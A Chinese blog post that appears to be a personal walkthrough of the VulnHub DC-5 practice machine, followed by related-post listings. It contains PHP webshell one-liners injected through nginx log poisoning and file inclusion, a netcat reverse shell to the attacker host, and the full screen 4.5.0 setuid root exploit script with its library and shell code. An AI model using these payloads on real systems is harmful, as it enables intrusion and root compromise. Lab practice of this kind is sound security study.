dc-5靶机渗透笔记

最新推荐文章于 2024-08-05 11:24:26 发布
最新推荐文章于 2024-08-05 11:24:26 发布
阅读量340 收藏
点赞数
分类专栏: 渗透测试 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_46274488/article/details/114490724
版权
这篇博客记录了作者在dc-5靶机上的渗透测试过程,包括发现主机,使用nmap扫描端口,尝试文件包含漏洞,利用PHP日志文件写入一句话木马,反弹shell,寻找并利用suid文件,特别是针对screen-4.5.0的提权方法,通过创建并加载恶意库文件实现。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.发现主机 192.168.14.153

2.开启nmap端口扫描,开放了80,111,37620端口

3.访问站点,啥也没有

4.扫描后台文件,还是啥也没有

5. 然后看别人的笔记就是,每刷新一次thankyou.php,页尾的年份就会更新,别人扫出了个footer.php,推断出thankyou.php会包含footer.php,然后就猜想有文件包含漏洞,至于传递的参数是file应该是爆破出来的。

6. 尝试读取/etc/passwd文件

7.想尝试远程文件包含,但是不知道路径,就此作罢。

8.将一句话木马写入到PHP日志文件中,再包含文件

日志路径为:/var/log/nginx/access.log,是系统默认路径,或/var/log/nginx/error.log

<?php @eval($_POST['cmd']);?> 也是 可以的

<?php passthru($_GET['hh']); ?>

关于passthru()函数的快速描述
passthru - 执行外部程序并显示原始输出

然后访问http://192.168.174.153/thankyou.php?file=/var/log/nginx/access.log用蚁剑连就行。

9. 然后打开终端反弹shell到kali

nc -e /bin/bash 192.168.174.128 4444

10,再执行python -c “import pty;pty.spawn(‘/bin/bash’)”获得交互式的shell。

11.然后查看suid文件

Find / -perm -4000  2>/dec/null

没有见到一个眼熟的suid文件可利用的,screen-4.5.0这个我还 真不知道是什么,也不知道怎么利用。

screen为多重视窗管理程序。此处所谓的视窗,是指一个全屏幕的文字模式画面。通常只有在使用telnet登入主机或是使用老式的终端机时,才有可能用到screen程序。

12.然后searchsploit screen 4.5.0,直接利用41154.sh文件

Kali用python开启一个简单的服务器python3 -m http.server 80

靶机下载到本地,permission denied,我就直接在蚁剑上传到/tmp目录下。

13. 修改权限,却执行不了

14. 网上是将41154.sh文件进行拆解,原本内容如下

#!/bin/bash

# screenroot.sh

# setuid screen v4.5.0 local root exploit

# abuses ld.so.preload overwriting to get root.

# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html

# HACK THE PLANET

# ~ infodox (25/1/2017) 

echo "~ gnu/screenroot ~"

echo "[+] First, we create our shell and library..."

cat << EOF > /tmp/libhax.c

#include <stdio.h>

#include <sys/types.h>

#include <unistd.h>

__attribute__ ((__constructor__))

void dropshell(void){

    chown("/tmp/rootshell", 0, 0);

    chmod("/tmp/rootshell", 04755);

    unlink("/etc/ld.so.preload");

    printf("[+] done!\n");

}

EOF

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

rm -f /tmp/libhax.c

cat << EOF > /tmp/rootshell.c

#include <stdio.h>

int main(void){

    setuid(0);

    setgid(0);

    seteuid(0);

    setegid(0);

    execvp("/bin/sh", NULL, NULL);

}

EOF

gcc -o /tmp/rootshell /tmp/rootshell.c

rm -f /tmp/rootshell.c

echo "[+] Now we create our /etc/ld.so.preload file..."

cd /etc

umask 000 # because

screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed

echo "[+] Triggering..."

screen -ls # screen itself is setuid, so...

 

libhax.c文件

然后编译成libhax.so蚁剑上传,删除libhax.c文件。

Rootshell.c文件如下:

再编译成rootshell同样蚁剑上传。剩下部分就是dc5.sh的内容。要添加:set ff=unix  否则在执行脚本文件时后出错,也通过蚁剑上传。

添加dc5.sh x权限

然后执行dc5.sh就能成功提权

 

总结

    最不理解的一点是提权那步,41154.sh为何执行不了,为何拆解之后就能成功提权呢,不是一样的吗?

 

【VulnHub靶机渗透】八:DC-5
野原新之助
05-07 776
靶机Web处存在文件包含漏洞,本地提权存在screen已知版本漏洞。 VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
DC-5靶机渗透测试
最新发布
m0_66225311的博客
08-11 956
远古靶机,心血来潮又打了一次,发现这里的文件包含获取shell的有了更简便的方式,所以重新编辑添加了利用PHP过滤链直接进行文件包含漏洞的RCE的方法,利用php_filter_chain_generator.py工具生成相应的RCE过滤链即可。界面,发现只是一个普通的界面,但是再次访问的时候,发现下面的标识发生了改变,猜测这个界面存在文件包含,通过刷新来随机访问某一个界面。
DC-5靶机渗透
m0_62008601的博客
05-21 774
攻击机kali:192.168.56.102(桥接网络) 靶机dc-5:192.168.56.106 (仅主机网络) 两台主机的ip设置在同一网段之后开始扫描存活主机: 扫描端口: nmap -sV -p- 192.168.56.106 80端口开放,用浏览器进行访问 并没有发现什么信息 wappalyzer插件中可以看到web服务器为nginx,接着在页面摸索一番,发现contact下可以提交表单 随便输入信息提交之后我们发现跳转到了另外一个页面且发现底部的年份发生了..
DC-5 靶机渗透
Rex_Surprise的博客
05-10 318
DC-5 靶机渗透 1.渗透过程 THEEND! DC-5 靶机渗透1.渗透过程 开始,扫描主机: netdiscover -r 192.168.0.1/24 找到一个 192.168.0.149 00:0c:29:cb:31:5f 1 60 VMware, Inc. 扫端口: nmap -sS -A -p- ...
DC系列(5DC-5靶机渗透
Nikris的博客
01-12 1226
DC-5
DC-5靶场渗透
一纸荒芜的博客
07-04 1831
DC-5 靶场
DC-1靶机渗透笔记
qq_60600840的博客
08-08 324
DC-1靶机、安全、渗透靶机
DC-6靶机渗透测试
m0_66225311的博客
08-05 628
又是一个远古靶机,最近又做了一做,发现可以直接用50110.py文件一把梭获取权限,不需要之前那么繁琐的用html文件来反弹shell了。第一次没能进行尝试,要不然就能搞点不一样的了
dc-6靶机渗透笔记
现代鲁滨逊的博客
05-12 256
1.主机发现192.168.174.157 2.nmap扫描 3.访问主站,在那之前和DC2一样,先在/etc/hosts文件加上靶机IP与域名的对应关系,站点看起来和dc2好像有点像,仅凭一点点记忆看看能不能自己攻下 4.用wpscan扫一扫,爆出来用户名 wpscan--url http://wordy/--enumerateu 5. 好的,准备搞一手弱口令爆破。事实是爆破了几个小时都还没出结果,折磨人,难道是姿势不对??应该是字典不够强大。一顿乱搞之后,我还是去翻了翻别...
DC-2靶机渗透全流程详细
qq_63940076的博客
03-20 2686
执行x的时候就相当于在执行shell这个同样是需要设置环境变量,这里就不再赘述获得命令权限后,我们寻找下一个flag找到flag3,提示susu是切换账户的命令,现在我们唯一另外的账户就是jerry,试试吧账号:jerry 密码:adipiscing密码来自于前面WPScan爆破所得Ok,查看权限查找下一个flagFlag4提示git,应该是要提权,一般最后一个flag都是提权到root。
DC-5靶机渗透测试(文件包含漏洞)
single_g_l的博客
03-26 9416
一、 环境 靶机: 192.168.1.127 攻击机:192.168.1.209 二、信息收集 1、主机发现&端口扫描 nmap -sP 192.168.1.0/24 #发现存活主机 nmap -sS A 192.168.1.127 #开放端口 2、访问80端口 3、尝试提交留言,刷新页面,“Copyright © 2017”动态变化 刷新页面,“Copyright © 2017”动态变化 4、dirsearch 扫描敏感目录 dirsearch .
[Vulnhub] DC-5靶机渗透
weixin_45605352的博客
08-07 235
0x00 环境搭建 靶机地址:http://www.vulnhub.com/entry/dc-5,314/ 下载之后用vmware打开即可,使用桥接模式。 开机后搭建完成: 提示 0x01 主机端口探测 用arp-scan -l探测内网存活主机,再用nmap -sV -p- ip来探测端口: ...
dc-5 靶机渗透学习
..
03-20 2034
信息收集 扫描存活主机 nmap -sP 192.168.202.0/24 对靶机开放的端口服务进行扫描 nmap -A -p- -v 192.168.202.143 漏洞利用 访问80端口 ,用Wappalyzer识别框架,发现只是个简单的页面 查看一下源代码,发现有五个php文件,分别对应五个标题 来到Contact查看了一下,发现有几个地方可以填写信息,抓取发送的数据包查看了一下,没什么特别。 发送数据后会跳转到thankyou.php,并且...
DC5靶机渗透测试
Huangshanyoumu的博客
04-17 500
文章目录环境版本:一、信息收集1.主机发现2.端口扫描二、漏洞发现1.访问靶机 web 服务2.尝试利用文件包含漏洞3.尝试将恶意文件写入日志4.利用文件包含访问日志并进行利用三、提权1.查看可以 root 权限使用的命令2.漏洞搜索3.查找 exp,并查看内容4.使用 ftp 进行传输文件 环境版本: VMware pro 16 Kali 2021.1(虚拟机) DC-5(虚拟机) 一、信息收集 1.主机发现 arp-scan -l 2.端口扫描 nmap -A -p- 192.168.2.186
Vulnhub靶机:DC-5渗透详细过程
IerkeU的博客
03-08 6076
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-5,314/ DC-5是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,需要具备中级的渗透测试技巧,只有一个可利用的入口点(也没有 SSH),你需要观察一些不寻常的(会随页面动态刷新的)东西,你的最终目标是放在root目录下的flag。 靶场攻略 信息收集 扫描c段发现目标主
DC-5靶机渗透详细步骤
wwxxss
10-18 813
DC5渗透测试
DC-5主机渗透
weixin_65920814的博客
05-25 284
本文详细介绍DC-5主机渗透测试的全部内容
DC-5 渗透测试
Darklord.W
04-14 1987
DC-5渗透测试 0x00实验环境 靶机DC-5,IP地址:192.168.8.138 测试机:Kali,IP地址:192.168.8.1400x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 主机发现 端口及服务扫描 访问web 扫描web目录 然而没有什么有价值信息 继续浏览得到 但是我们发现这里contact页面的年份...
DC-1靶机渗透测试攻略及DC-2靶机简介
DC-1靶机是Vulnhub提供的众多靶机之一,专门设计用于学习和练习渗透测试技术。 DC-1靶机描述中提到的渗透测试,是指一种旨在评估计算机系统安全性的方法,通过尝试攻击系统来找到安全弱点。渗透测试人员(俗称“白...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值